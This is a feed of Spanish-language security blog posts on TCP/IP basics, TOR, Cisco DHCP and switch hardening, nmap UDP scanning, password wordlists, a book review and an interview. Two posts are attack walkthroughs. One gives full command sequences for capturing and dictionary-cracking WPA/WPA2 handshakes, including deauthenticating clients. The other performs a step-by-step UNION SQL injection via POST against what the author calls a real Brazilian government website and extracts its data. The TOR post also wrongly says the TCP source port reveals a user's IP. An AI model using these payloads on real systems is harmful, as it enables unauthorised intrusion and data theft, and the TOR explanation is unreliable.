Quantcast
Channel: PeruCrack
Viewing all 40 articles
Browse latest View live

Curso bàsico de Ethical Hacking - Napstic

$
0
0
Hola! Les queria compartir un curso realzado por mi amigo JC Rodriguez de Puerto Rico, el curso es muy basico pero orienta de una manera dinamica los aspectos fundamentales de un proceso de Ethical Hacking normal.


El curso lo pueden ver en el siguiente canal de Youtube busquen los videos que se llaman ehmod

Módulo 1: Bienvenida al Curso de Ethical Hackers
Módulo 2: Cómo crear un laboratorio de seguridad
Módulo 3: Cómo crear una máquina virtual
Módulo 4: Ciclo del Hacking 1 – Reconocimiento
Módulo 5: Ciclo del Hacking 2 – Escaneo
Módulo 6: Ejercicio de Escaneo
Módulo 7: Escaneo SNMP
Módulo 8: Introducción al Wireless Hacking
Módulo 9: El mundo del Ingeniería Social
Módulo 10: Email Falso – Phishing
Módulo 11: Seguridad en los Passwords
Módulo 12: Troyanos y Backdoors
Módulo 13: Herramientas para su laboratorio de seguridad
Módulo 14: Leyes Federales
Módulo 15: Vulnerabilidades
Módulo 16: Principios de un Botnet
Módulo 17: Google Hacking Database
Módulo 18: Background Check
Módulo 19: Certificaciones
Módulo 20: Despedida

Les advierto que en algunas partes JC dice algunas cosas de las cuales no estoy de acuerdo pero pueden comentarlas por aquí




Orientacion en temas de nuevas tecnologias y propiedad intelectual para trujillanos

$
0
0
El equipo de abogados de Iriarte y Asociados ha venido destacando en eventos legales, eventos de hacking, defendiendo nuestros derechos en el congreso frente a leyes absurdas, capacitando a las mas reconocidas startups peruanas en temas legales, luchando contra los ilógicos defensores de apdayc, entre otros.

En estosultimos días del 2013 se tomo la desición en el team de volver a salir de lima a exponer los temas mas resaltantes de las leyes en nuevas tecnologias y propiedad intelectual. Esta ves le tocó la suerte a trujillo.

Del 27 al 31 de enero del 2014 estará el team por trujillo capacitando a los trujillanos que quieren emprender y a aquellos que ya emprendieron.


Para reservar tu asistencia y consultas, enviar un mail a contacto@iriartelaw.com

Post oficial en su blog:

http://www.iriartelaw.com/Iriarte-y-Asociados-orientara-a-trujillanos-en-temas-de-nuevas-tecnologias-de-la-informacion-y-propiedad-intelectual


Sobre el autor : 
------------------------------------------------------------------------------------------------------------

Camilo Galdos (AKA Dedalo) : Pentester, Running 2 TorRelays, Paranoid, Python and PHP Writter. Security Researcher, Acknowleged by Twitter/ Adobe/ MicroSoft/ Paypal/ Apple/ Ebay/ Nokia/ Netflix.
Blog :Seguridadblanca.in 




------------------------------------------------------------------------------------------------------------

Convirtiendo numeros binarios a decimales

$
0
0
Saludos Crackeros! En esta publicacion queria explicarles rapidamente el metodo y la importancia de conocer la conversion de binario a decimal y de decimal a binario, esto con el fin de entender los temas de direccionamiento IP en redes, subneting e incluso ruteo. Debemos entender que los sistemas se comunican con 1 y 0 y que en esto radica la importancia de saber mas de ellos..



Debemos entender en primer lugar que el sistema numerico binario solo tiene 2 valores posibles ( 1 o 0) y estos toman diferentes tipos de valores en cuanto a la posicion en la que esten ubicados. Con este concepto pueden entender rapidamente lo que significa este sistema de numeracion. 




Convirtiendo de binario a decimal : 

Vamos a tomar como ejemplo el numero 10011011. En lista las potencias de dos de derecha a izquierda. Comienza con 2 elevado a la 0, evaluándolo como “1” incrementaremos el exponente de uno en uno para cada potencia (derecha a izquierda) Nos detendremos cuando el numero de digitos sea igual al numero de digitos binarios. El número de ejemplo, 10011011, tiene 8 dígitos, así que la lista, de 8 elementos, se verá así: 128, 64, 32, 16, 8, 4, 2, 1


Colocamos el numero binario debajo de la serie de numeros elevados a la potencia definida :


Finalmente sumamos los valores decimales de todos los que tengan relacion con el 1 , es decir 128+16+8+2+1 = 155 

Otro metodo :

Existe un segundo metodo el cual es denominado el metodo del duplicado que con mucha practica nos puede resultar mucho mas facil que el metodo tradicional.

Vamos a convertir el numero 1011001 a decimal :

El metodo del duplicado consiste simplemente en duplicar el numero anterior de izquierda a derecha y sumarle ese mismo numero..


En el ejemplo estamos cojiendo el numero 1 , vamos a duplicar el numero a su izquierda (0) y lo duplicaremos (0x2) para luego sumarle ese mismo numero 1


Ahora seguimos con el segundo digito que es el 0 y cojemos el numero anterior (1) y lo duplicamos (1x2) para luego sumarle el mismo numero 0 = 2

Seguimos asi sucesivamente..



Al final sumamos todos los resultados en decimal y obtendremos el numero binario convertido en decimal.

Como ven solo requiere practica y se hace sencillo.. este tema es muy importante cuando mas adelante expliquemos temas de redes ip , direccionamientos, subeting ,etc!

Saludos Crackers!


TOR para Dummies : Explicando el funcionamiento de TOR

$
0
0
Seguro ya muchos han oído hablar de esta famosa herramienta y su gran utilidad a la hora de querer ser "Anonimo en Internet", o quizás muchos ya han oído hablar de esta herramienta cuando se menciona a la famosa "DeepWeb", sin embargo son muy pocos los que entienden el concepto de esta extraordinaria herramienta y el porque su efectividad, en este post me gustaría explicarles el funcionamiento detenidamente para que luego puedan entender y así sacarle aun mas provecho.


En primer lugar es necesario entender el concepto de lo que es el protocolo TCP. TCP (Transmission Control Protocol) es un protocolo de red encargado de la transmisión de datos. Un ejemplo puede ser cuando necesitamos enviar un mensaje a otra computadora este se envía como un paquete TCP el cual esta compuesto por una respectiva cabecera y un respectivo cuerpo (Datos) :

Veamos la cabecera TCP : 

La cabecera TCP esta formado por diferentes valores entre los cuales destacan el Puerto Fuente u Origen, Puerto Destino, Numero de Secuencia, ACK, Ventana Deslizante, Checksum, etc... Todos estos valores en su conjunto definirán el destino, tamaño, seguridad, acuse, etc que tome nuestro paquete enviado

Ahora centremonos en el puerto origen con este valor el destino ya sea una PC, un servidor, una pagina web o lo que sea puede conocer el origen desde donde se envía el paquete o la petición y ya con este valor conocer nuestro origen

Ahora.. que pasaría si existe alguien en el medio alguien que actúa como intermediario este forwardea la petición hacia un destino con el fin que este destino capture el puerto origen de este intermediario y no del nuestro..



La filosofía de TOR explica que existe toda una red de intermediarios que intervienen en la comunicación hacia un servidor y esto anonimisa nuestra identidad ya que como antes explique forwardea el mensaje y retransmite



Hagamos un ejemplo de que Roger quiere comunicarse a los servidores de perucrack.net normalmente puede hacerlo directamente visitando desde su PC y usando su navegador para lo cual el servidor web de perucrack interpretaría la petición TCP de Roger y podría conocer el puerto origen en la cabecera y con ello lograr obtener la dirección IP de Roger y registrarla.

Ahora que pasaría si Roger usa TOR , ahora Roger podría utilizar diferentes computadoras como intermediarios de su comunicación siendo la ultima quien envíe su propia petición de comunicación TCP al servidor de Perucrack y este registraría la petición de este ultimo computador y no de Roger


Muy bonito hasta ahora.. pero digamos si envío un mensaje a traves de los intermediarios y este llega a un servidor destino..¿Que me garantiza que este mensaje no haya sido alterado?, o mas aun que me garantiza que la respuesta que reciba no haya sido alterada? La respuesta es Encriptacion


Explicare brevemente algo de criptografia, existen dos claves que sirven para descifrar un mensaje encriptado una denomianda llave publica y la otra denominada llave privada, puedo usar cualquiera de esas para cifrar un mensaje pero en todo caso debo usar la otra para poder descifrarlo. Pongámonos en ambos casos :

Uso la clave publica para cifrar y la privada para descifrar, Que logro con esto? CONFIDENCIALIDAD, exacto.. en un ejemplo yo cifro un mensaje con una clave publica pero necesito de la privada para descifrarla y esta privada solo lo tiene cierto destinataria entonces el y solo el puede descifrar ese mensaje.

Uso la clave privada para cifrar un mensaje y la clave publica para descifrarlo, Que logro con esto? INTEGRIDAD Y AUTENTICACION ya que solo la persona que dispone de la clave privada me pudo mandar ese mensaje.

Vamos a meternos mas a fondo a la cebolla!! :




Voy a relacionar la cebolla así como la conocemos con el funcionamiento de TOR, usando un método que leí hace ya varios años.. Supongamos que el núcleo de la cebolla es el Paquete TCP y las capas son estos intermediarios que se usan para llegar al destino .


Alice envía un mensaje formado por el núcleo de la cebolla (Paquete TCP) y las capas (Cifrado mediante clave publica), Alice envía a cada intermediario el mensaje con quien negocia la llave simétrica que esta enviando este AUTENTICA y forwardea el mensaje

Pueden ver el siguiente vídeo para entender en resumen el funcionamiento de las redes TOR :





Script para verificar estado de los servicios

$
0
0
Saludos Crackers! Hace unos dias un buen amigo me comento que habían unos plugins que facilitaban muchas veces conocer el estado de un servicio en uno de sus servidores linux, es decir saber si tiene el servicio web activo o no o si se esta ejecutando el servicio de correos por ejemplo, le dije que si existian esos "plugins" pero que también habia la posibilidad de correr scripts que le puedan facilitar esa información, les comparto el script se realize : Para quienes aun no tengan en claro el concepto de script pueden leer el articulo publicado anteriormente "El arte del batcheo"   sin mas que decir les comparto la información : 






Pueden usarlo para cualquier servicios solo cambien los parámetros resaltados



#!/bin/sh
#Verificar estados servicios SOLAMENTE...
echo "///////////////////////////////////////////////////"
echo "Comprobando servicio WEB SERVER"
SERVICE='httpd'
if ps ax | grep -v grep | grep $SERVICE > /dev/null
then
echo "El servicio $SERVICE esta ejecutandose"
else
echo "///////// El servicio $SERVICE esta DETENIDO \\\\\\\\\\\\\\\\\"
fi
echo "///////////////////////////////////////////////////"
echo "Comprobando servicio MYSQL"
SERVICE2='mysqld'
if ps ax | grep -v grep | grep $SERVICE2 > /dev/null
then
echo "El servicio $SERVICE2 esta ejecutandose"
else
echo "////////////El servicio $SERVICE2 esta DETENIDO \\\\\\\\\\\\\"
fi
echo "///////////////////////////////////////////////////"
echo "Comprobando servicio de CORREO"
SERVICE3='postfix'
if ps ax | grep -v grep | grep $SERVICE3 > /dev/null
then
echo "El servicio $SERVICE3 esta ejecutandose"
else
echo "////////////El servicio $SERVICE3 esta DETENIDO \\\\\\\\\\\\\"
fi
echo "WWW.PERUCRACK.NET"


Hackeando WPA y WPA2 sin usar WPS

$
0
0
Saludos Crackers!!  Hoy quisiera explicar un poco de teoría de cifrado en redes inalambricas y a la vez también enseñarles como es posible crackear una red wifi "protegida" con WPA o WPA2 sin usar WPS...
Como sabrán me gusta siempre explicar la teoría antes de la practica y es eso lo que haremos ahora : 



WPA
Con servidor de autentificacion
Cifrado RC4 con TKIP (Ya vulnerable)
Redes corporativas y empresariales con servidor Radius (Enterprise)
Hardware antiguo se necesita actualizar el firmware.

WPA -2
Con servidor de autentificacion.
Cifrado CCMP: AES con clave de 128bits,
Redes corporativas y empresariales con servidor Radius (Enterprise)
Hardware que no lo integre no puede funcionar.

WPA -PSK
Sin servidor de autentificacion
Cifrado RC4 con TKIP
Redes domesticas o empresas pequeñas
Hardware antiguo se necesita actualizar el firmware.

WPA2-PSK
Sin servidor de autentificacion
Cifrado CCMP: AES con clave de 128bits,
Redes domesticas o empresas pequeñas
Hardware que no lo integre no puede funcionar.

*PSK : Pre Sahred Key, es la llave precompartida que conmunmente usamos para autenticarnos a una red Wifi 
* La redes empresariales usan un modo de autenticacion en Raidus el cual permite el ingreso independiente de cada uno de
los clientes a la red wifi
* WPS facilita la creacion de WLANs cuando esta funcion se habilita el asociaciamiento automatico, hay 2 modos:

  • Pulsando el boton del punto de acceso, esto sincroniza el dispositivo y el punto de acceso uniendolo a la red.
  • Mediante PIN: El punto de acceso te da un pin que es introducido por el dispositivo y lo une a la red.

Ahora vamos a explicar la practica de ataque y para ello me gustaría usar Kali Linux :



Primero vamos a ver la descripcion de nuestra tarjeta de red inalambrica 

ifconfig -a 

Posteriormente vamos a decirle a  Kali que detecte la tarjeta

airmon.ng

Como podemos ver esta detectando la interfaz wlan0 y la descripción de la tarjeta que vamos a usar

Lo siguiente es desactivar nuestra tarjeta de red inalambrica para cambiar nuestra Mac y la volvemos a activar, para eso usaremos lo siguiente 

ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up

Vamos a hacer un barrido para ver todos los puntos de acceso para ello nos ponemos en el modo de escucha o tambien llamado modo monitor .
airodump-ng mon0 



El siguiente paso es capturar paquetes para que de esta forma podamos crear el archivo .cap , para ello usaremos el siguiente comando en consola :

airodump-ng --bssid 5C:33:8E:A7:D4:B8 -c 7 -w wpa2labs.cap mon0

-- bssid : Es el MAC del router que vamos a atacar
-c : Es el canal en el que esta trabajando el router
-w : Especificamos el nombre del archivo .cap
mon0 : Es el interfaz de la red

Bueno! , ahora debemos esperar a que se autentique un nuevo cliente a la red o mejor aun podemos desconectar a todos y esperar a que se autentiquen nuevamente :

Para ello podemos usar el siguiente comando :

aireplay-ng -0 30 -a 5C:33:8E:A7:D4:B8 mon0
Aqui explicamos el numero 30 es el numero de desautenticaciones que vamos a mandar al router, luego especificamos la MAC del router y finalmente la interfaz de red que usamos




Una vez lo tenemos usaremos nuestro diccionario, puedes creartelo tu o puedes hacerlo. Simplemente es un bloc de notas con una contraseña por linea.

aircrack-ng -w 10kcommon.txt wpa2labs-01.cap

10kcommon.txt es el diccionario que vamos a usar y wpa2labs-01 es el archivo .cap que vamos a cracker, asi que solo quedaría esperar


Dependerá de que tan robusta sea la contraseña que queremos obtener, tambien de que tan bueno sea el diccionario y finalmente de que tan potente sea nuestro equipo.

Saludos!!


Construir un diccionario propio para un Pentesting

$
0
0
Hoy quiero compartir con ustedes una herramienta muy util a la hora de querer crear nuestros propios diccionarios usando combinaciones alfanuméricas basadas en palabras determinadas, se trata de Mutator Tool.



Mutator Tool es una herramienta que puede ayudar a los especialistas de seguridad a probar que tan predecibles son realmente las contraseñas utilizadas en las empresas, ya que la forma en que construimos nuestras contraseñas, suele ser un punto débil si no se tienen los cuidados necesarios. Si bien el tamaño de la contraseña es importante, no utilizar combinaciones sencillas también lo es.


¿Qué permite hacer la herramienta?

Mutator Tool, es una herramienta que basada en una palabra puede generar una serie de combinaciones alternando minúsculas y mayúsculas, mezclando números, caracteres especiales y otras cadenas definidas previamente.

Una vez se obtiene el diccionario de palabras puede hacerse una revisión exhaustiva que permita establecer si hay alguna coincidencia entre este listado y alguna de las contraseñas utilizadas en los sistemas de la empresa.

Configuración y ejecución de Mutator Tool

Esta herramienta tiene un módulo llamado mutator.c que contiene una sección en la que se pueden definir los caracteres especiales que se van a utilizar, además de aquellos caracteres que se van a reemplazar y las cadenas adicionales que se van a mezclar con las palabras que hayamos definido.




Una vez configuradas las opciones de mutación, se ejecuta la herramienta para que esta realice los cambios sobre la lista de palabras definida



En este caso, de una lista de cinco palabras hemos obtenido un diccionario de más de 10000 combinaciones diferentes.


Como se puede ver en la captura anterior, Mutator Tool toma las palabras y les va a haciendo modificaciones de acuerdo a las características que hayan sido definidas.

Agradecimientos: Camilo Gutierrez Amaya, Laboratorios ESET.


SQL Injection usando el método POST

$
0
0
Saludos Crackers!...., en este post les vengo a explicar como explotar una Base de Datos manualmente pero esta vez no en metodo GET si no en metodo POST, y bueno se preguntarán.

¿Como qué en Método Post?



Pues esta vez para utilizar este método necesitaríamos el complemento add-nos para Mozilla Firefox (Live HTTP Headers), este complemento lo que hace es capturar las cabeceras y el tráfico de donde nosotros hemos entrado además también podremos ver nuestras cookies, bueno empecemos como verán mi victima será la web del gobierno de Brasil pero no la mostrare ya por seguridad.

Bueno entonces comencemos como explique antes, para este método necesitaríamos alguna barra de búsqueda para comenzar a consultar la base de datos, bueno entonces como podrán ver encontré una barra de busqueda entonces en esa barra colocare cualquier número y nos aparecerá lo siguiente en el complemento add-nos Live HTTP Headers.



Okey y como ven nos ha capturado la cabeceras y ahora haremos lo siguiente, en la primera barra donde aparecera la URL daremos a repetir y nos aparecerá lo siguiente.



Bueno y como vemos la repetición esta en contenido "POST", ahora como vemos en el contenido post nos apareció "busca=1", okey entonces colocaremos una tilde y veremos si es vulnerable o no.





Y como podremos ver es vulnerable la website !, ahora colocaremos lo siguiente para comenzar a consultar la base de datos, comenzaremos colocando 
"order by unnúmero--+" 
donde dice un número es donde elegiremos cualquier número que nosotros queramos otra cosa para saber si esta es la columna o no es la columna a veces nos aparecerá nada, algunas otras veces nos aparecerá error algunas otras veces nos aparecerá "Unkown Column" y cuando es la columna pués no tiene que aparecer el complemento completo de la página web, bueno comenzemos colocando 

"order by 8--+"




Bueno y como vemos no es la columna ahora probemos con 
"order by 7--+" 
haber si esta es la columna.



Y como vemós esta si es la columna !, ahora pondremos lo siguiente para que nos comienze a dar las consultas de la base de datos, colocaremos 
"union select 1,2,3,4,5,6,7--+" 
sin las comillas y nos aparecerá lo siguiente.



Y como vemós nos apareció el número "2" entonces ese es el que elegiremos para comenzar a consultar la base de datos, entonces borraremos el número "2" y pondremos lo siguiente.

union select 1,group_concat(0x3c62723e,table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--+


Y como verán en la imagen esas son las tablas de la base de datos, ya casi llegamos al último paso, bueno entonces elegiremos la tabla "categorias" para evitarnos problemas al públicar los datos del administrador, okey entonces ahora haremos pondremos lo siguiente.

union select 1,group_concat(0x3c62723e,column_name),3,4,5,6,7 from information_schema.columns where table_name=0x63617465676f72696173--+

Como verán el 0x no significa nada pero el "63617465676f72696173" es el nombre de categorias y como lo encodie, pués muy fácil como se me habia olvidado antes también necesitariamos el complemento HackBar, y en que parte de la sección lo encodeo?, pués muy fácil les pasaré una imagen de la sección.




Le daremos click pondremos el nombre de la tabla y listo estará encodeado, bueno ahora siguamos, colocamos lo que escrbí y nos quedaría así.


Y como vemos nos ha aparecido las columnas de la tabla categorias (id, nome), y como vemos en la imagen solo hay dos entonces pondríamos lo siguiente para completar el resultado de las consultas al sacar la base de datos.

busca=1' union select 1,group_concat(0x3c62723e,0x3d,id,0x3d,nome),3,4,5,6,7 from categorias--+


 Y como vemos nos ha sacado la información de la columna !, otra cosa el "0x3d" significa el signo (=) pero en forma en hexadecimal, bueno entonces esto sería todo, hasta la próxima crackers!!!



Hacker Epico: Un libro técnico muy entretenido

$
0
0
Ya muchos habrán escuchado hablar sobre este libro de la editorial 0xWord escrito por Alejandro Ramos y Rodrigo Yepes pues hoy me gustaría compartirles mi opinión acerca de este libro :




El solo leer la Sinopsis ya atrae a cualquier tipo de persona interesada en este mundo de la informática, las computadoras y la seguridad : 

Sinopsis :
Ángel Ríos, auditor de una empresa puntera en el sector de la seguridad informática, se encuentra en el mejor momento, tanto en el terreno profesional como en el personal. A las puertas del fin de semana, está a punto de terminar un importante proyecto y se prepara para acudir a una cita con Yolanda, antigua compañera de clase de la que siempre ha estado enamorado. Sin embargo, el encuentro no sale como esperaba: ella no está interesada en iniciar una relación; sólo quiere que le ayude a descifrar un misterioso archivo. Ángel empieza a sospechar que algo raro está pasando, pero el corazón le mueve a aceptar el encargo sin hacer preguntas. Lo que no imagina es que el compromiso que ha adquirido con la chica va mucho más lejos que un simple trabajo. De pronto, se ve envuelto en una intriga relacionada con el contenido del archivo que complicará su vida y lo expondrá a un grave peligro. En el camino hacia la verdad, únicamente contará con sus sorprendentes conocimientos de hacking y el apoyo de su peculiar amigo Marcos.
No es dificil sentirse identificado con el personaje principal "Angel Rios" quien como muchos de nosotros nos han pedido ciertos favores en algún momento sabiendo de nuestros pocos, regulares o muchos conocimientos en informatica, pone al personaje en una posicion entre ayudar a la chica de sus sueños o mandarla a volar por creer que solo lo quiere para ciertos favores, en este caso un archivo "cifrado" el cual fue entregado en un USB por esta "chica de sus sueños" llamada Yolanda..


Angel se dara cuenta que ese archivo esconde mucho mas de lo que cree y cuando se de cuenta que esta en juego mucho mas que un archivo secreto Angel usara todos sus conocimientos en informática y hacking para descubir la verdad. 

A lo largo de la historia leeremos temas de Seguridad Web (Xss), Cracking, Seguridad Inalambrica, Analisis Forense, Cifrado de Datos, Seguridad Redes Moviles, Ingeniería social entre muchas otras técnicas.

Lo mas emocionante de la novela es que mezcla un toque policial en la que nuestro personaje se vera envuelto entre golpes, patadas, tiros, persecuciones, etc con lo cual contara con su compañero de infancia Marcos, un amigo que todos quisiéramos tener que acompañara a Angel en la búsqueda de la verdad y serz el encargado de la fuerza física en la historia




Realmente es un libro muy recomendado para una lectura amena, tecnológica y entretenida, es de esos libros que te dan ganas de prestar a cualquier amigo interesado en estos temas. 

Recuerda que puedes adquirir este y todos los libros de la editorial 0xword en la Tienda de Perucrack



Adquiere tu libro Hacker Epico en la TIENDA DE PERUCRACK




Configuración básica del servicio DHCP en Cisco

$
0
0
Como algunos de mis conocidos sabrán que una de mis pasiones son las tecnológicas Cisco y todo lo que con ellas se puede hacer en una red, en esta ocasión quisiera explicarles la configuración básica del servicio DHCP en estoy routers.

¿Que es el servicio DHCP?

De las iniciales (Dynamic Host Configuration Protocol) es un protocolo de asignación dinámica de direcciones es decir que permite a los clientes de una red sea cual sea el dispositivo obtener sus parámetros de configuración de red automáticamente



Para explicarles mejor como configurar este servicio en equipos CISCO propongo esta simple topologia :


Primero configuraremos el RouterDHCP de la siguiente forma :

RouterDHCP(config)# hostname Router_DHCP
RouterDHCP(config)# ip dhcp pool Router_DHCP
RouterDHCP(dhcp-config)#network 192.168.1.0 255.255.255.0
RouterDHCP(dhcp-config)#default-router 192.168.1.1
RouterDHCP(dhcp-config)#dns-server 192.168.1.2 

En la primera linea definiremos el nombre del Router_DHCP (Estando en la opción de configuración global)
En la segunda linea definiremos y crearemos el pool DHCP de nuestro router
En la tercera linea definiremos el rango de toda la red
En la cuarta linea podemos definir default gateway o puerta de enlace por defecto
En la quinta linea deinimos los servidores dns entregados por el servidor dhcp

Es importante definir un rango de direcciones exclusivas las cuales no podran ser entregados por el servidor DHCP, esto se usa en caso tengamos servidores, routers, PCs con direcciones de ip fijas. Para ello usamos el siguiente comando

RouterDHCP(config)# ip dhcp excluded-address 192.168.1.1 192.168.1.10

Finalmente probamos que nuestro host final obtenga la direccion IP automaticamente haciendo una busqueda de servidores DHCP activos.





Escaneando los puertos UDP usando NMAP

$
0
0
Hola amigos y lectores, en este post les vengo a explicar como escanear puertos UDP (User Datagram Protocol) atravéz de la herramienta de código Libre Nmap, primero les explicare para que se usa está herramienta.



Nmap como su palabra lo dice "Mapeo de Puertos" es una herramienta de Código Libre que es compatible para todo los sistemas operativos(Windows, Linux, Unix, Mac Os, FreeBSD, etc), Nmap se puede utilizar de muchas formas tiene demasiadas utilidades Escaneo de Puertos Tcp / Udp / Etc, los administradores de las websites también utilizan Nmap para ver que peligro puede tener su website atravéz de algún puerto vulnerable que pueda evitar peligrar su website.


También se preguntarán..

¿Qué es UDP (User Datagram Protocol)? Es un protocolo de capa de transporte que se basa en el intercambio de Datagramas, el cual a diferencia de TCP este es "No orientado a Conexion"



Bueno comencemos para comenzar escanear Puertos UDP (User Datagram Protocol) necesitaríamos el parámetro "-sU" sin las comillas.

Los estados que Nmap Vincula en los puertos UDP serían los siguientes:

open: Nmap indica este estado cuando existe una respuesta desde el sistema objetivo. No es una situación usual, ya que por lo general el target no responde.

open/filtered: Esta ambigüedad se debe a que en ciertos casos no es posible validar el estado del puerto. Tal como se indicó anteriormente, debido a que este protocolo no posee alerta de recepción o envío, puede darse el caso en que un puerto se encuentre abierto pero no responda a una determinada cadena de entrada. Nmap envía el paquete en blanco, y en ciertos casos, el servicio detrás del puerto UDP de interés puede tomar los datos de entrada como inválidos y no responder. En el caso de que el puerto se encuentre filtrado por un firewall o un IDS/IPS, el comportamiento puede ser similar. De esta forma, Nmap responde con este tipo de respuesta que puede resultar ambigua.

closed: Nmap indica este estado cuando existe un error del tipo “ICMP port unreachable error”. Esto es un error de tipo 3. En este caso es posible afirmar que el puerto se encuentra cerrado.

filtered: Este estado corresponde a algún tipo de error diferente al anterior.
Bueno entonces comenzaríamos a escaneos los puertos UDP, abririamos la terminal y pondríamos lo siguiente.

"nmap -sU --top-ports 100 scanme.nmap.org"

Sin las comillas entonces lo pondríamos, como podemos ver el parámetro "-sU" es un parámetro para escanear puertos UDP el "--top-ports" es la respuesta de los puertos Udp, el proceso es demora ya que anda escaneando 100 puertos.


Saludos Crackers! 





Seguridad en Switches Cisco

$
0
0
Los Switches son dispositivos de red fundamentales ya que nos permite establecer las interconexiones de equipos y dispositivos de red en la capa de enlace de datos (Modelo OSI). Su función es interconectar dos o más segmentos de red, de manera similar a los puentes de red, pasando datos de un segmento a otro de acuerdo con la dirección MAC de destino de las tramas en la red.




En este articulo quisiera hablar un poco sobre la seguridad a la hora de configurar estos dispositivos y algunos aspectos a tener en cuenta por el Administrador de Red respectivo 


Lo primero cuando hablamos de seguridad en dispositivos de red es establecer las contraseñas de acceso al dispositivo para lo cual ingresaremos a la configuración del switch y estableceremos lo siguiente :

switch # conf t
switch(config) # line console 0
switch (config-line)# password cisco
switch (config-line)# login
switch (config-line)# line vty 0 15
switch (config-line)# password cisco
switch (config-line)# login
switch (config-line)# exit
switch (config)# enable secret class

Explicare brevemente lo que hicimos en esta configuracion :

switch # conf t
switch(config) # line console 0
switch (config-line)# password cisco
switch (config-line)# login

Al ejecutar el comado line console 0 identifica la línea específica para la configuración e inicia el modo de reunión de comandos de configuración, con este comando ingresa a la consola, luego digitamos password cisco con ese comando se establece el password "cisco" para el ingreso a la consola y finalmente "login"el cual sera el encargado de habilitar la contraseña

Ahora en la siguiente parte estoy habilitando y estableciendo la contraseña para las conexiones telnet

switch (config-line)# line vty 0 15
switch (config-line)# password cisco
switch (config-line)# login
switch (config-line)# exit

En la linea de confguracion line vty 0 15 especifico el numero máximo de conexiones múltiples a partir de 0, en este caso establezco 15. Luego establezco la contrasela con el comando "password cisco"y finalmente lo habilito con login

Finalmente configuro el acceso al modo privilegiado del switch, con el que ingreso con el comando enable
para ello uso el comando enable secret class.

Con esto ya hemos configurado la seguridad de contraseñas para el acceso al switch, sin embargo aun falta mayor seguridad.

Los switches Cisco nos permite configurar los puertos de cada uno de los switches y por ende su propia seguridad, vamos a analizar la siguiente configuración tipica de puertos :

switch# conf t
switch(config)# int fa0/1
switch(config-if)#switchport mode access
switch(config-if)#switchport port-security
switch(config-if)#switchport port-security maximum 2
switch(config-if)#switchport port-security mac-address sticky
switch(config-if)#switchport port-security violation protect
switch(config-if)#exit



Primero hemos ingresado al modo de configuración para luego ingresar al puerto fa0/1.El comando switchport mode access configura el puerto especificado en el tipo "acceso" esto asegura que si es que configuramos una determinada Vlan para ese puerto solo esa vlan sea la que pase por ese puerto. Luego vemos que configuramos el comando switchport port-security pues este comando activa el modo de seguridad de puerto y activa los modos por defecto, luego digitamos el comando switch(config-if)#switchport port-security maximum 2 este comando establece un numero maximo de dispositivos que se conectaran a ese puerto, el numero maximo de direcciones MAC asociadas a ese puerto en este caso 2, luego con el comando switchport port-security mac-address sticky este comando permite que el primer equipo que se conecta se asegura el puerto."osea no tiene que registrarse" y finalmente el comando switchport port-security violation protect este comando si tiene las siguientes variantes :


Switch(config-if)#switchport port-security violation protect

Protección: Rechaza los paquetes hasta que el causante de la violación es subsanado, el usuario no advierte que se ha producido una violación de seguridad.

Switch(config-if)#switchport port-security violation restrict

Restricción: Rechaza los paquetes hasta que el causante de la violación es subsanado, el usuario advierte que se ha producido una violación de seguridad. De manera específica se envía un mensaje SNMP, se registra un mensaje de syslog y se aumenta el contador de violaciones.

Switch(config-if)#switchport port-security violation shutdown 





Desactivación (default): La interfaz se deshabilita de manera inmediata por error y se apaga el led del puerto. También envía un mensaje SNMP, se registra un mensaje de syslog y se incrementa el contador de violaciones. Cuando esto sucede es necesario volver a habilitar el puerto manualmente mediante el comando "no shutdown"."en pocas palabras el puerto se apaga"

Como ven conocer todos estos parametros nos permite reforzar la seguridad de nuestras redes coporativas, en otro post explicare un poco más de seguridad a nivel logica ya cuando tratemos temas de vlans y permisos!

Saludos Crackers!


Entrevista a Marco Morales CCIE R&S, Security, SP y CCDE

$
0
0
Quisiera compartir con ustedes una entrevista que le hice hace aproximadamente 9 meses a Marco Morales uno de los profesionales mas destacados  en redes y comunicaciones a nivel nacional e internacional. Marco trabaja actualmente en el área de consultoria avanzada en Cisco y es uno de los pocos en el país que cuenta con 4 de las certificaciones máximas y mas difíciles de conseguir, CCIE Routing and Switching , CCIE Security, CCIE Service Provider y CCDE ( Cisco Certified Design Expert) 


En esta entrevista nos da muy buenas pautas y recomendaciones, nos cuenta un poco sobre el y habla sobre la carrera de Redes. aquí esta la entrevista :


Hola Marco, gracias por venir a la entrevista, estas son algunas de las preguntas que hemos ido armando durante esta semana :

P: ¿Por qué escogiste redes como especialidad?
R: Yo en un inicio comencé en software, me dedique al desarrollo de software como programador, hasta que se me dio la oportunidad de trabajar en redes e inmediatamente me gusto y dije “Yo me quedo acá” y bueno me quede.

P: ¿Cuál fue tu primer trabajo relacionado a la carrera? ¿Alguna vez pensaste en cambiarte de carrera?
R: Cuando comencé en redes siempre quise quedarme en redes, cuando comencé a estudiarlo me di cuenta que había un montón de cosas que aprender, como la lógica de los protocolos. En mi primer trabajo comencé de practicante en la empresa que estoy ahora haciendo demostración de equipos y de soluciones 

P: ¿Qué te motivo a llegar tan lejos en las certificaciones Cisco?
R: Eso va más por un tema personal, pienso que si te gusta algo debes llegar lo más lejosque puedas y ese esfuerzo va acompañado de un tema de desarrollo profesional y propiamente del desarrollo de tu carrera, ademas la satisfacción de haber conseguido algo con tu esfuerzo es muy importante

P: ¿Sigues dedicándote a la configuración de equipos?
R: Si, hasta ahora configuro equipos, yo trabajo en lo que es Diseño, planteo las soluciones y hago la documentación de los comandos, entonces debo configurar e implementar

P: ¿Qué es lo más complicado en el diseño de una solución para un cliente?
R: Yo creo que lo más complicado es cumplir con los requerimientos del cliente bajo la realidad que hay en ese momento.

P: ¿A qué lugares te ha llevado tu profesión?
R:Yo trabajo mucho en Latino américa y debo viajar constantemente a países de Sudamérica, Centroamérica y el Caribe. Cada vez que hay algún cambio o proyecto debemos atenderlo


P: En cuanto a la realidad del mercado laboral en el Perú ¿Crees que es más importante dedicarle más tiempo al estudio para las certificaciones técnicas o mejor para cosas relacionadas a la carrera estudiada, cursos, maestrías, etc?
R: Si mencionamos específicamente al Ingeniero de Red y si uno quiere ver el aspecto técnico durante mucho tiempo debería seguir la línea de certificaciones técnicas. Las maestrías, doctorados, etc ya es para alguien que desea apuntar a un tema de gestión


P: ¿Piensas seguir sacando más certificaciones CCIE?
